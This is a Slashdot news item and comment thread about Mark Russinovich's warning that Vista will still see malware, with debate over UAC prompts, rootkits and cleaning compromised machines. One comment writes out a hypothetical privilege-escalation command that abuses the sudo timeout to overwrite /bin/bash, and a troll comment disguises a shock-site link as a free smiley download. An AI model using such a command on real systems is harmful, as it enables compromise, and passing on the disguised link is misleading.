Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Russinovich Says, Expect Vista Malware

kdawson posted more than 7 years ago | from the UAC-be-damned dept.

Windows 193

Hypertwist writes "Despite all the anti-malware roadblocks built into Windows Vista, Microsoft technical fellow Mark Russinovich is lowering the security expectations, warning that viruses, password-stealing Trojans, and rootkits will continue to thrive as malware authors adapt to the new operating system. Even in a standard user world, he stressed that malware can still read all the user's data; can still hide with user-mode rootkits; and can still control which applications (anti-virus scanners) the user can access. From the article: '"We'll see malware developing its own elevation techniques," Russinovich said. He demonstrated a social engineering attack scenario where a fake elevation prompt can be used to trick users into clicking "allow" to give elevated rights to a malicious file.'

Sorry! There are no comments related to the filter you selected.

Actually (5, Funny)

Anonymous Coward | more than 7 years ago | (#18847865)

I'm really quite surprised by this.

Re:Actually (4, Interesting)

SEMW (967629) | more than 7 years ago | (#18848161)

Actually, I'm really quite surprised by this.
Quite surprised by what, that programs running in user-mode can still access the current user's data and programs in their home folder? Hardly news.

(I was slightly confused by the statement that programs "can still hide with user-mode rootkits", though -- surely if a rootkit is running with LUA privs, it wouldn't be able to hide itself? I thought the whole point of a rootkit was that it allows malicious programs to maintain root (i.e. highest privilege) access undetected, which would make "user-mode rootkit" a bit of a contradiction in terms, unless I'm misunderstanding somewhere...?)

(And whilst I'm posting, "...a social engineering attack scenario where a fake elevation prompt can be used to trick users into clicking "allow" to give elevated rights to a malicious file"? If it's a prompt that will give a malicious program elevated rights when the user clicks 'allow', what part of it is fake? Surely a fake/spoofed dialogue box wouldn't *actually* be able to grant elevated rights (pretty much by definition); and the text in the *real* elevation prompts can't be changed, since they run in 'secure desktop' sandbox mode, no?)

Re:Actually (2, Insightful)

Workaphobia (931620) | more than 7 years ago | (#18848427)

> "Quite surprised by what, that programs running in user-mode can still access the current user's data and programs in their home folder? Hardly news."

The GP was being extremely sarcastic. I'm sure most of the people who read this summary, or even just the title, thought "Duh" and wondered why an expert like Russinovich didn't have anything more insightful to say.

> "surely if a rootkit is running with LUA privs, it wouldn't be able to hide itself?"

Well it wouldn't be able to hide itself from the root, but I don't see why it couldn't hide itself from other limited user apps.

> "If it's a prompt that will give a malicious program elevated rights when the user clicks 'allow', what part of it is fake?"

The fake part would be the premise under which it is requesting additional rights. Maybe it's masquerading in the dialog as a service the user already has.

I like the quote from the article: "Elevations are a convenience and not a security boundary".

Re:Actually (2, Informative)

TheCoelacanth (1069408) | more than 7 years ago | (#18848455)

(I was slightly confused by the statement that programs "can still hide with user-mode rootkits", though -- surely if a rootkit is running with LUA privs, it wouldn't be able to hide itself? I thought the whole point of a rootkit was that it allows malicious programs to maintain root (i.e. highest privilege) access undetected, which would make "user-mode rootkit" a bit of a contradiction in terms, unless I'm misunderstanding somewhere...?)

"User-mode" usually refers to everything other than the kernel. Nothing prevents a user-mode program from gaining root access. Though admittedly, from the context, it doesn't seem like he meant that.

Re:Actually (2, Informative)

mrsteveman1 (1010381) | more than 7 years ago | (#18848819)

The real problem is the millions of users who blindly use the system without even the most basic understanding of how it works. You would not be surprised at the number of users who can't tell a real windows dialog box from a pop up on the web warning that you "need to scan your hard drive".

As long as people literally refuse to learn anything more than the bare minimum necessary to quickly read their email, nothing will change, especially with totally incompetent systems like windows vista, which is quite possibly the worst operating system I have ever used, save for some various conveniences like the segmented networking settings and file management/organization. Vista is "better than xp", but that is still horrible.

I understand that software should "just work", but at this point in Vista's case, it doesn't. You can either keep refusing to learn, or you can protect yourself. Is it worth it to blindly trust a company that has repeatedly shown they aren't deserving of trust? Or is it worth more to users to take a small amount of time to educate themselves about the system they trust to view banking records.

Re:Actually (1, Funny)

Anonymous Coward | more than 7 years ago | (#18849247)

> unless I'm misunderstanding somewhere...?

No, I think you're just misunderestimating Windows.

Re:Actually (4, Interesting)

Fhqwhgadss (905393) | more than 7 years ago | (#18849275)

surely if a rootkit is running with LUA privs, it wouldn't be able to hide itself?

Too bad there are lazy software companies pulling this kind of shit [chessok.com] . The developer's link to this piece of shit "patch" is listed under the headline "Convekta's products are compatible with Windows Vista !!!" (just disable the single most important security feature of the OS). I'd bet that over half of all Vista boxes will have LUA disabled within 12 months of installation. What do you have then? A new OS with the security enhancements removed and untested code running in "every user is a superuser" mode, just like XP without the 6 years of bugfixes. Don't tell me XP has limited accounts; using XP under a limited account takes more effort than using Linux ever did.

The only thing keeping the malware writers away from Vista so far is its piss-poor market penetration, not its security enhancements.

Re:Actually (3, Interesting)

lpw (1089731) | more than 7 years ago | (#18848483)

Providing a truly secure OS is antithetical to the Windoze Nature, i.e., that of an OS for dummies. Maintaining a secure system takes time, know-how, and sometimes even reading some fucking manual. But Microsoft's "operating systems" are intended for the PC, a platform where the majority of users are not willing to make that investment. Eventually, once the novelty of MS Paint wears off, a user needs to install another application in order to actually accomplish something useful on the PC. Because MS necessarily assumes that the user is a brain-dead clod, a simple scheme like the allow-or-deny elevation masquerade is necessary (and, of course, the user can be easily duped into installing malware). Anything more sophisticated, and the appeal (and usability) of Windoze to the masses suffers, because it's no longer "user friendly." After all, if grandma needs to dick around with file and process permissions, why not just install Linux? No version of Windoze will be a truly secure system until its user base becomes better educated, which is a requirement that Microsoft will never enforce to protect their bottom line.

Re:Actually (1)

JonathanR (852748) | more than 7 years ago | (#18848929)

No version of Windoze will be a truly secure system until its user base becomes better educated, which is a requirement that Microsoft will never enforce to protect their bottom line.
By definition, the user base of Windose will always wallow in mediocrity. Microsoft needs to take responsiblity for this, if it wants to dominate the OS marketplace.

I think that MS missed their opportunity to make Vista really secure. They could have developed a brand new API, and sandboxed the old API in a virtual machine environment, to maintain backwards compatibility. Then publish decent standards for building applications, particularly with respect to file permissions, drivers etc, so developers can genuinely create robust applications that don't require administrative privileges to run. Enforce the standards by making them mandatory for using the OS installation mechanism. Enforce proper use of the correct installation mechanisms by disabling rogue installation hacks with system updates (i.e. deliberately break third party vendor's software if it's crap).

Re:Actually (2, Insightful)

drsmithy (35869) | more than 7 years ago | (#18849689)

By definition, the user base of Windose will always wallow in mediocrity. Microsoft needs to take responsiblity for this, if it wants to dominate the OS marketplace.

"Wants to dominate" ? What _have_ they been doing then ?

I think that MS missed their opportunity to make Vista really secure. They could have developed a brand new API, and sandboxed the old API in a virtual machine environment, to maintain backwards compatibility.

Way, way too many negative tradeoffs. 99% of software would not be native and its functionality would suffer significantly.

Then publish decent standards for building applications, particularly with respect to file permissions, drivers etc, so developers can genuinely create robust applications that don't require administrative privileges to run.

What's wrong with the current ones, that have been around for more than a decade ? Hell, what's wrong with just good old common sense and decent developer practices ?

No developer has had any excuse for releasing software that needlessly requires Administrator privileges for at least 8-9 years. None.

Enforce the standards by making them mandatory for using the OS installation mechanism. Enforce proper use of the correct installation mechanisms by disabling rogue installation hacks with system updates (i.e. deliberately break third party vendor's software if it's crap).

Oh yeah. Microsoft deliberately breaking third party software. I can just imagine how well that will go over, given the flack they cop when they _accidentally_ break some random piece of software.

Good plan you've got there, tiger. If you were lucky, you might have even managed to get all of it spoken in a product design meeting without being laughed out of the room.

This isn't the open source world where developers can just go around breaking shit willy-nilly to make end users conform to some arbitrary plan for the hell of it (despite many people here insisting to the contrary).

Security through obscurity (4, Funny)

EmbeddedJanitor (597831) | more than 7 years ago | (#18848629)

Well, to hack/infect/trojan a Vista system you first have to find one. Considering the high switchback rate to XP that's going to be harder than previously expected.

Re:Actually (3, Interesting)

313373_bot (766001) | more than 7 years ago | (#18848851)

What if Microsoft wrote a new OS, and no one bothered writing applications for it, not even malware? Despite all ineffective security and bad design decisions, the prevalence of viruses, trojans and spyware on previous Windows versions were (and are) in part due to their sizable market share. If Vista Me II isn't being attacked like old Windows, is it because it's so more secure, or is it because no one cares? Only time will tell, but I can't take of my mind the image of a mighty tree falling in the middle of a forest, with no one to hear it.

Free screensaver !! (2, Insightful)

Anonymous Coward | more than 7 years ago | (#18847907)

with companies like ask.com (who run smileycentral a well know spyware site) nothing will change

just click on setup.exe and you can have this fantastic free screensaver, be the envy of your friends !

Re:Free screensaver !! (1)

Adambomb (118938) | more than 7 years ago | (#18847983)

No Way!

In other news.. (1)

renegadesx (977007) | more than 7 years ago | (#18848501)

Expect Vista exploits!!! OMG!

Why the, extra comma? (-1, Troll)

Anonymous Coward | more than 7 years ago | (#18847909)

Is this, a new writing style?

Re:Why the, extra comma? (1)

dsanfte (443781) | more than 7 years ago | (#18848089)

Commas represent pauses in speech. Speaking that headline, you'd pause in exactly the same place.

Re:Why the, extra comma? (2, Informative)

vux984 (928602) | more than 7 years ago | (#18848141)

The comma isn't extra:
Proper punctuation for a sentence like this is:

Someone said, "Something that they said goes here."

A comma is supposed to precede the quote. If anything, one might ask, why the headline is missing the quotes. :)

Re:Why the, extra comma? (1)

dsanfte (443781) | more than 7 years ago | (#18848245)

The comma isn't extra:


I never said it was.

Re:Why the, extra comma? (2, Funny)

Petrushka (815171) | more than 7 years ago | (#18848463)

Oh, that's easy: because it takes a lot longer to type &quot; ... &quot; than it takes to type " ... " into the <title> tag. (Though that's still not as long as it took me to type this comment.)

Well, no shit (4, Funny)

hairykrishna (740240) | more than 7 years ago | (#18847939)

In similar news, despite a wide variety of new content, online pornography remains disproportionately popular.

Re:Well, no shit (1)

seaturnip (1068078) | more than 7 years ago | (#18848743)

Actually no, it's in relative decline [economist.com] .

The "anti" strikes again. (2, Funny)

Anonymous Coward | more than 7 years ago | (#18847985)

"He demonstrated a social engineering attack scenario where a fake elevation prompt can be used to trick users into clicking "allow" to give elevated rights to a malicious file.'"

Good thing geeks are anti-social.

Vista malware (5, Funny)

psaunders (1069392) | more than 7 years ago | (#18847987)

Russinovich Says, Expect Vista Malware
Old news. Vista has been available for months now.

ATTN: SWITCHEURS! (-1, Troll)

Anonymous Coward | more than 7 years ago | (#18848265)

If you don't know what Cmd-Shift-1 and Cmd-Shift-2 are for, GTFO.
If you think Firefox is a decent Mac application, GTFO.
If you're still looking for the "maximize" button, GTFO.
If the name "Clarus" means nothing to you, GTFO.

Bandwagon jumpers are not welcome among real [imageshack.us] Mac [imageshack.us] users [imageshack.us] . Keep your filthy, beige [imageshack.us] PC fingers to yourself.

Smilies (4, Funny)

yotto (590067) | more than 7 years ago | (#18848025)

So you're telling me I shouldn't have installed these smilies? Here, let me try a typical smiley face. :-@*&^^^ NO CARRIER

Re:Smilies (1)

MadnessASAP (1052274) | more than 7 years ago | (#18848631)

Thats not funny, I had a neighbor whose computer I would fix on a regular basis and she insisted on using IE6 and installing that god damn smiley tool bar. She also once fell for one of those BS anti-virus programs you see on the internet. The ones that actually fill your computer with spams, fortunately for me she moved.

And ... ? (5, Interesting)

khasim (1285) | more than 7 years ago | (#18848029)

So now you know that Vista can be compromised ... what are you doing about it?

Where's the clean boot disk that I can use to scan a Vista box? How do I validate all the files on it?

What is your answer to AFTER the box has been cracked?

Re:And ... ? (2, Interesting)

Anonymous Coward | more than 7 years ago | (#18848145)

To be fair, Vista's ultimate solution is probably no different from any other system:

Nuke it from orbit, reinstall.

The only difference is the hope they don't deny your registration after doing that too many times.

I suppose they could have a "Boot from CD and validate" option, but, because of subsequent system changes as the user installs drivers and other legitimate software (which could still include bogus stuff), it would probably be tricky to implement except for a few key system files that don't (or shouldn't) ever change, and that would miss alot of malware. More useful would be if it were possible to create a "known good" system image, and a way to compare that to the present state of the system or to reinstall that image. I know that XP has system save points (or whatever they are called), but I'm thinking about something more comprehensive. Do they have anything like that yet?

Re:And ... ? (1)

SLi (132609) | more than 7 years ago | (#18848153)

People in the Windows world seem to ignore this until it becomes painfully obvious to them, but the only guaranteed solution, and the only solution real experts would offer (which I'm really glad is understood in the Unix world!) to you if it were of any importance that the malware be completely eradicated from your computer, to an administrator or system level compromise is a full reinstall or restore from backups before the compromise. Anything less than that and there is a way the malware can evade.

I know it's painful. But it's the only way. Admin or system level compromise is not a routine matter, no matter how much some people like to portray it as such.

Not necessarily. (5, Interesting)

khasim (1285) | more than 7 years ago | (#18848253)

I can boot with a LiveCD and mount the hard drive so that NONE of its files are being run.

Then I simply match each and every file on the hard drive to the package that it should have come from and validate the md5 checksum.

Any file that is NOT accounted is suspect and can be individually evaluated. Most of them should be data files that are not executable.

Remember, in Linux, everything is a file and the boot process is very clearly defined. If something is running on your machine, you can find what it is and why it is running.

Any system that REQUIRES a complete tear down after ANY vulnerability is exploited is NOT a well designed system. There has to be a way to validate each section of the system.

Re:Not necessarily. (1, Interesting)

SLi (132609) | more than 7 years ago | (#18848365)

In theory, yes, you can do that. In reality though in any reasonable system quite a number of configuration files have been modified, and the users have stuff in their home directories that does not directly come from any installation CD that could be used for at least a user-level exploit (which makes a root exploit dramatically easier). In such a system it is generally quite a bit less work actually to do a reinstall and reconfiguration than combing all the files with the kind of comb you need to catch all things evil. It's like trying to find the proverbial needle in the haystack, except that the needles have been deliberately hidden and you don't know how many there are – and if you miss one, you lose.

Read what I had posted, okay? (4, Insightful)

khasim (1285) | more than 7 years ago | (#18848457)

In reality though in any reasonable system quite a number of configuration files have been modified, and the users have stuff in their home directories that does not directly come from any installation CD that could be used for at least a user-level exploit (which makes a root exploit dramatically easier).

I had already addressed that.

I had said:
"Any file that is NOT accounted is suspect and can be individually evaluated. Most of them should be data files that are not executable."

Again, you should be able to automatically validate the system files, then you manually check the others. Those others include the config files, user files and so on.

In such a system it is generally quite a bit less work actually to do a reinstall and reconfiguration than combing all the files with the kind of comb you need to catch all things evil.

If that were correct than your newly installed box would be cracked as soon as those user files were restored.

And, yes, they will need to be restored.

So, in EITHER case those files will have to checked for "all things evil".

But in my scenario, the box is validated FASTER and you can identify the files that were added/replaced.

More importantly, you can validate whether the box WAS compromised.

It's like trying to find the proverbial needle in the haystack, except that the needles have been deliberately hidden and you don't know how many there are - and if you miss one, you lose.

I take it that you don't work on Linux boxes much.

There are a finite number of files on the box. And EVERYTHING is a file.

The more of them that you can automatically validate, the smaller the number of files that you have to search through. This isn't magic. It's something called "Computer Science".

In your scenario, you rebuild the box, restore the users' files ... and you've just been compromised again.

Re:Read what I had posted, okay? (1)

Watson Ladd (955755) | more than 7 years ago | (#18848923)

That's not computer science. That's systems administration. And not everything is a file in Unix. Everything is a file in Plan 9. Although automatic validation will not fix the problem of misconfiguration. If you have been 0wnd, you should see what you forgot to patch, and what configuration mistakes you made.

Re:Read what I had posted, okay? (0)

Anonymous Coward | more than 7 years ago | (#18849223)

And not everything is a file in Unix.
Like what?

Re:Read what I had posted, okay? (0)

Anonymous Coward | more than 7 years ago | (#18849791)

Berkeley sockets?

Re:Read what I had posted, okay? (2, Insightful)

Daengbo (523424) | more than 7 years ago | (#18849661)

In my opinion, you have just highlighted the strength of the average package system in Linux vs. the binary patch system some people would like to go to. Making a hash comparison is easy in the first case but either more difficult by a magnitude or just impossible, depending on how the patch is done, I guess.

As much as moving to a binary patch system would save bandwidth, I find the .deb, .rpm, and .tgz packages to have significant strengths.

Re:Not necessarily. (0)

Anonymous Coward | more than 7 years ago | (#18848407)

That works. You're comparing a known good install to a suspect system in such a way that you know the comparison is good. However, two points:

(1) How do you know that the CD has booted up with clean code? How do you know that the malware hasn't infiltrated the code that runs before the CD bootstrap is read? (BIOS or equivalent) Yes, the odds are very good it hasn't ... but how do you know?

(2) How much time is such a comparison going to take? Would it be quicker to just nuke and re-install?

Re:Not necessarily. (1)

QuantumG (50515) | more than 7 years ago | (#18848561)

If they've owned your BIOS, reinstalling won't help.

Flash BIOS exploits (1)

jmorris42 (1458) | more than 7 years ago | (#18848761)

> If they've owned your BIOS, reinstalling won't help.

Something I'm suprised doesn't actually happen more often.

But even if it ever does, I'm as ready as I can be for it. I write protect the BIOS whereever possible and it is usually possible.

I really like the Gigabyte DualBios feature as well, for a belt & suspenders approach. You can't write the BIOS without keyboard intervention during POST and even IF you screw up or opt to enable writes (I guess the Windoze folk prefer the GUI update util) you can still reboot, hit a hotkey and with a few keystrokes get back to a known good BIOS.

A lot of other reputable hardware makers at least give you a BIOS rescue mode of some sort. Just enough smarts in in a protected space for Hold a key / move a jumper and it blindly flashes from a floppy. Prefer those vendors, for sooner or later somebody IS going to make a serious run at BIOS. Of course we tend to ignore the OTHER flashable parts, most optical drives and even some HD drives. Yet to see a drive with a flash write protect jumper.

Re:Flash BIOS exploits (2, Interesting)

QuantumG (50515) | more than 7 years ago | (#18848811)

Hmm.. wonder if you could flash a CD-ROM drive to run arbitary code on start-up.. presumably yes.

Re:Flash BIOS exploits (1)

Joe The Dragon (967727) | more than 7 years ago | (#18849543)

It's better to flash a video card or other pci-e / pci card as they can have there roms loaded before the os stars up

Re:And ... ? (4, Insightful)

QuantumG (50515) | more than 7 years ago | (#18848257)

I love the way people say "you need to reinstall" .. as if you're going to do better building the box to be secure this time.

Re:And ... ? (2, Insightful)

SLi (132609) | more than 7 years ago | (#18848381)

Well, you had better, because if you don't, you'll have go through the same again. Many people learn from their mistakes, fortunately. Reasonable security even on Windows is not that hard, if you take the steps before the compromise.

Re:And ... ? (0)

Anonymous Coward | more than 7 years ago | (#18848419)

I haven't seen anyone in the Windows world who ignores that. Every security professional, Windows or Linux, that I've ever met has said exactly what you did: the only way to ensure that you've completely eliminated a root-level compromise is to reinstall from scratch and restore from a known-good backup. (The part about "known-good" backups is the tricky part, since most compromises lie dormant for weeks or months before they are activated. Simply choosing the last full backup before your box started launching DoS attacks isn't sufficient.)

The reason that most machines are "fixed" instead of rebuilt is based on something else you said:

it were of any importance that the malware be completely eradicated from your computer

Generally speaking, it's not of importance. Partially that's because hackers usually go after the low-hanging fruit, and a system that's been "fixed" and secured (more than it was before, anyway) is no longer low-hanging fruit. The hacker could perhaps get back in if he devoted any attention to the matter, but with literally millions of other boxes he could hack with no special effort at all, why bother?

The general strategy for security is to look at your server and figure out how much of a target you're going to be. Then you secure the server just enough to make it harder to crack than comparable machines. A good hacker who's targeting you in particular will still be able to get in, but nothing you can possibly do will change that anyway. And the more secure your system is, the more of a pain in the ass it is for its rightful users to access. The trick is knowing where to draw the line, and it's what separates good security professionals from bad ones. (Tip for managers who may be reading this: Good security people will get hacked sometimes, because bad security people will lock down systems to the point of utter uselessness. Their machines will be immune to compromise, but they'll also be immune to productive work.)

Re:And ... ? (3, Funny)

WrongSizeGlass (838941) | more than 7 years ago | (#18848181)

What is your answer to AFTER the box has been cracked?
I've found that super glue works pretty well, bu nothing is as good as blue duct tape. Blue duct tape rules.

Re:And ... ? (1)

alshithead (981606) | more than 7 years ago | (#18849335)

"I've found that super glue works pretty well, bu nothing is as good as blue duct tape. Blue duct tape rules."

Your duct tape has been hacked. Duct tape does not come in blue. The blue tape is masking tape for painting. Yes, it does stick very goodly...but by that fact alone it is not duct tape. Real duct tape is gray or silver and DOES NOT stick nearly as goodly to some surfaces.

Re:And ... ? (1, Informative)

SpaceLifeForm (228190) | more than 7 years ago | (#18848187)

Rename files containing 'install' to something else.

Link [theregister.co.uk]

The height of stupidity from Microsoft.
Will they be able to top it?

Re:And ... ? (1)

zcat_NZ (267672) | more than 7 years ago | (#18849677)

Not enough. vista looks at things other than the filename to decide if your program is an installer, and I've heard that it's infuriatingly good at recognizing them too. So if you want to take a look at some potentially interesting but non fully trusted program, setting it up in a special 'sandbox' login just to try it out is just not an option. You're just going to have to let the installer have access to your entire system, like it or not.

Duh! (4, Funny)

Cervantes (612861) | more than 7 years ago | (#18848049)

From the "No fucking shit, sherlock" file...

Malware writers will write malware for the latest OS? And they'll try and find ways around the blocks? And in the millions of lines of code, they'll find a weakness and succeed? Holy shit, I never would have guessed!!

Seriously, sometimes when I read Slashdot, a small part of my brain cries out in pain, and then is silent forever.

Duh!-Not here. (0)

Anonymous Coward | more than 7 years ago | (#18848101)

"Malware writers will write malware for the latest OS? And they'll try and find ways around the blocks? And in the millions of lines of code, they'll find a weakness and succeed? Holy shit, I never would have guessed!!"

Except when talking about Linux of course.

Re:Duh! (0)

Anonymous Coward | more than 7 years ago | (#18848247)

Seriously, sometimes when I read Slashdot, a small part of my brain cries out in pain, and then is silent forever.
Will you let us know when the typing part of your brain goes silent forever?

Re:Duh! (4, Funny)

Workaphobia (931620) | more than 7 years ago | (#18848449)

> "Seriously, sometimes when I read Slashdot, a small part of my brain cries out in pain, and then is silent forever."

This was only the first in a sequence of articles, the next being "Hackers can break into unsecured wireless routers."

The Jedis are going to feel this one.

yeah, but look who's saying it! (1)

ummit (248909) | more than 7 years ago | (#18848603)

Yeah, yeah, obvious as hell, but the surprise here -- and it's a pretty huge one -- is that someone from Microsoft is saying this. What's up with that?

Re:yeah, but look who's saying it! (1)

evilviper (135110) | more than 7 years ago | (#18848947)

Don't worry. He's just new there. He'll become utterly detached from reality soon enough.

Re:Duh! (1)

drsmithy (35869) | more than 7 years ago | (#18849887)

Malware writers will write malware for the latest OS? And they'll try and find ways around the blocks? And in the millions of lines of code, they'll find a weakness and succeed? Holy shit, I never would have guessed!!

The only "weakness" the majority of malware succeeds against is the weakness of the user to do whatever it asks them to so they can watch porn, get new smileys, win an ipod, etc.

Hey, Russinovich (3, Insightful)

Ranger (1783) | more than 7 years ago | (#18848109)

Vista is Malware!

Standard plug-in joke #3: (4, Funny)

Black Parrot (19622) | more than 7 years ago | (#18848111)

In Russinovich, malware attacks Vista.

An Expected Approach (5, Insightful)

gooman (709147) | more than 7 years ago | (#18848117)

He demonstrated a social engineering attack scenario where a fake elevation prompt can be used to trick users into clicking "allow" to give elevated rights to a malicious file.

That is the scenario I have been envisioning since I first installed RC1. Microsoft is conditioning users to agree to about anything by having so many intrusive pop-ups. People just want to get on with their computing experience. Maybe they will read the warning a few times at first, but after a short while they just respond without reading because that is how they get to the next step. Of course malware writers will use this method, it is almost as if Microsoft has given them a gift.

Re: An Expected Approach (1)

Ephemeriis (315124) | more than 7 years ago | (#18848389)

That's something that I noticed almost immediately when I installed Vista. I guess I don't know how it would be for your typical home user, but the things I was trying to do kept asking me for permission. Had to click OK to install software...had to click OK to change network settings...had to click OK to change firewall/filesharing settings when it detected a new network...had to intentionally run the command prompt with administrative rights, and then click OK to allow it... Maybe your average user wouldn't see it so much, maybe they would, but it got to the point where I wasn't even reading the warnings anymore.

By contrast, Ubuntu asks you relatively seldom. At the command prompt I'm frequently having to sudo stuff, but it just asks for your password, you don't get asked if it's OK or not. Synaptic asks for permission...a few system changes do...installing software usually does... But I got the OK prompt a dozen times a day with Vista, compared to once or twice with Ubuntu.

Macs also prompt the user for administrative operations...but again, it's far less frequent than Vista.

Re: An Expected Approach (1)

VertigoAce (257771) | more than 7 years ago | (#18848553)

Vista just asks me for my password. I haven't seen this cancel or allow prompt in months. When I need admin access for a task I have to type in an admin password. The kinds of tasks that require admin access in Vista seem to be more or less the same as those in Linux that require root.

Basically, the behavior you are seeing is that you are taking a shortcut and running as root all the time. Any time you actually need to be an admin it'll ask for your permission, but not require a password, since you already logged on as an admin. You really shouldn't be running in this mode. I tend to name the first account "Admin" and immediately create my own user account. I never directly log in as Admin, just like I never have a full KDE session as root.

I think the main situation where people are seeing these prompts unexpectedly is with hard drives that were configured under XP to be writable only by admins. If you don't change the permissions before using Vista, standard users won't have write access. You'll run into the same problem pretty easily under Linux (mounting a drive with every file owned by root with 0755 permissions).

Re: An Expected Approach (1)

gutnor (872759) | more than 7 years ago | (#18848741)

First, I don't have Vista and I don't plan to have it.

However, I assume that in a sane environment, the user should be asked when it install software ( at least the one that register some system-wide stuff - which is pretty much everything in windows world ), change firewall/antivir settings, network config,... unless it runs in administrative mode of course

When people talk about confirmation box, I suppose they run in user mode where that makes sense to elevate a process priviledge when running 'admin' stuff. Not the best feature, but a nice user-friendly transition option for people that have been using their computer in Admin mode since they have one.

If you are still running Vista in Administrator mode by default either you or Microsoft (for not defaulting that type of installation mode) screwed up somewhere. Warning boxes in Administrative mode are little more useful for security than a sign 'don't jump' next to a cliff.

Re: An Expected Approach (1)

Daengbo (523424) | more than 7 years ago | (#18849741)

What's kind of scary on Ubuntu is the sudo and gksudo timeout. If you invoke gksudo to gain administrative privileges one time, then you don't have to type the password in again for a few minutes. What if a piece of malware invokes a program like update-manager which asks for your password, then immediately follows up with "gksudo cp ./bash /bin/bash" and gets sudo privileges? Sounds dangerous to me, and not different from the Vista problem highlighted in TFA.

Re: An Expected Approach (1)

Daengbo (523424) | more than 7 years ago | (#18849811)

Bad form replying to myself, but I realized that the user-level program could just monitor the system and wait for gksudo to be called by the user, then call it again almost immediately to install a rootkit. Much simpler and more foolproof than trying to spoof something.

Re: An Expected Approach (1)

Durandal64 (658649) | more than 7 years ago | (#18848395)

What is the method, exactly? How does putting up a fake elevation prompt accomplish anything? If it's a fake elevation prompt, by definition, it accomplishes nothing. To get elevated privileges, you have to go through UAC, and the actual elevation interface exists on a separate desktop to prevent scripts from faking a click on the "Allow" button. So how is this "attack" any different from just presenting a random button to the user that says "CLICK ME OMG PLEEEZE CLICK ME!!!"?

Re: An Expected Approach (1)

NatasRevol (731260) | more than 7 years ago | (#18848451)

The question is - can the script prompt the real UAC interface and because the user is so used to just clicking Accept to get things to work, and the rootkit is thus installed by the user?

Re: An Expected Approach (2, Insightful)

funkyloki (648436) | more than 7 years ago | (#18849101)

The gift is that Microsoft can now "blame" the user for their weakly written OS. By making it the user's responsibility to approve/disapprove just about every freakin' thing that runs on the Vista box, they can then go back and say "Gee, too bad you got that virus/spyware/malware infection, but it's not our fault, you clicked Allow".

Instead of making a better, more secure OS, they just shifted the culpability for weak security to the user.

Really? (1)

adona1 (1078711) | more than 7 years ago | (#18848129)

I was amazed to find out that a Windows OS will probably get malware.

That's it for today. Time to go to my home under a log. Where I've been living for the last two decades :)

Re:Really? (1)

alshithead (981606) | more than 7 years ago | (#18849451)

"That's it for today. Time to go to my home under a log. Where I've been living for the last two decades :)"

Dude...you are so way behind teh times...Shouldn't you like be living under a ROCK! Living under a log has been out of date for like evar...

Re:Really? (1)

adona1 (1078711) | more than 7 years ago | (#18849869)

I'm an environmentalist, I'll only live under biodegradable objects ;)

Why is this news? (1)

grapeape (137008) | more than 7 years ago | (#18848133)

Seriously, this is like one of those headlines where researchers find that depressed people are more likely to commit suicide or that water is wet. As long as there are stupid users there will be exploited computers and as long as Microsoft has the lions share of the market there will be more zombied windows boxes.

I had a bit of a disagreement with a client today over spam on her computer. She freaks out if there is more than one in her inbox. Every time I am at her machine she has webshots or smily central or whatever the "cool" spyware infested freebie of the week happens to be. She claims that she should be able to download what she wants but that I should be able to keep her system clean in spite of it. Its a no win situation, as long as she chooses to be stupid im stuck getting the blame for her problems.

Ingris Featherstrom (0)

photomonkey (987563) | more than 7 years ago | (#18848139)

Download 1000+ free smiley icons for AOL, ICQ and Windows Messenger by clicking on this link [goatse.cx] and also by sending me your name, Social Security number, address, and a pair of your wife's panties (but only if she's hot).

Also, we have v1@grA and C1ALIS sof-tabs and gelcaps!!!11!!!11!

Please install bugfix-324234.exe (0)

Anonymous Coward | more than 7 years ago | (#18848231)

Even the best operating will not stop worst user from installing something on their system intentionally if they have some type of "official" word from someone. I seen thousands of these "Please install this bugfix-xxxxx.exe" emails hitting my mail server and I seen how convincing they look with the Microsoft logo and apparently correct email contact information and almost perfect Microsoft font. Most of my shop are Macs so I don't really have to worry about this but I still sent out a email message about not installing anything from the email or web unless you have initiated contact with the vendor.
Vista doesn't stop these intentional installs of malware, the user will "okay" to everything to bypass security the malware installs.

but but.... (1, Insightful)

Anonymous Coward | more than 7 years ago | (#18848275)

but...but.....

vista is supposed to be completely secure.......

feelings of betrayal over buying a whole new PC to run this POS OS are setting in. Allow or deny?

Unix-style permissions are not enough. (5, Interesting)

earthbound kid (859282) | more than 7 years ago | (#18848289)

People sometimes talk like strong enforcement of Unix-style permissions is sufficient to provide local security. I find that argument totally unconvincing. Yes, it's nice to have the confidence that with modern OSes like Linux, OS X, and (probably) Vista I won't end up like the old Windows where you have to reformat a disk to try to clear the deeply dug in roots of some spyware crap from the system, but there's still the pretty damn big issue of all my data. Namely, having to reinstall the OS would be a pain, and I'm glad I don't have to waste an hour doing it, but losing all my data (documents, photos, music, and to a lesser extent application preferences) would be devastating. The data on my PowerBook is my life, and the reassurance that at least I don't have to reinstall OS X would be cold comfort at best. True, I do make a monthly backup onto an external drive that is normally unplugged (and thus out of range of rm *ing attacks), but probably most users don't follow this practice. Besides, a subtler virus could just silently corrupt my data over a period of months, so that I don't notice what's going on until my backups are no longer any good!

There is a solution to the problem, but it requires a deep rooted change in how things are done. What I propose is that we shift from permissions by user to permissions by application. Right now, any app that my user launches can erase any of my files. That's ridiculous! Much more logical would be allowing me to decide which subset of my files each app can user and how. So, for example, I would let FireFox write downloads to my desktop and its preferences and caches to subfolders of the Library, but I wouldn't want it to be able to erase any of my other files under any circumstances. In fact, most of the time I don't even want FireFox to be able to read my local files, but I'd be willing to put in a password to let it do on a time limited basis so during uploads and the like.

Basically, what I'm proposing amounts to sandboxing every app. This may seem harsh, but why not do it? What's the advantage of letting any app destroy any of my files? Make them at least beg me for permission first, I say!

So, that's what's on my wishlist for the future of OS level security.

Re:Unix-style permissions are not enough. (1)

DaleGlass (1068434) | more than 7 years ago | (#18848417)

One word: SELinux

It's not new either. And it does what you want it to do. However, it's a royal pain in the ass to configure, because you need to figure out what every application should be able to do. It's definitely not something for a newbie, and probably it will be long before such a thing is usable by normal people.

Also, I doubt it'll work well for Windows. For Linux sure, distributions would just have to provide the SELinux security settings for the packages. But for Windows? Who provides the list of things the application should be able to do? It can't be the author, as all the malware would just ship rules allowing them to mess with whatever they need.

Re:Unix-style permissions are not enough. (0)

Anonymous Coward | more than 7 years ago | (#18848467)

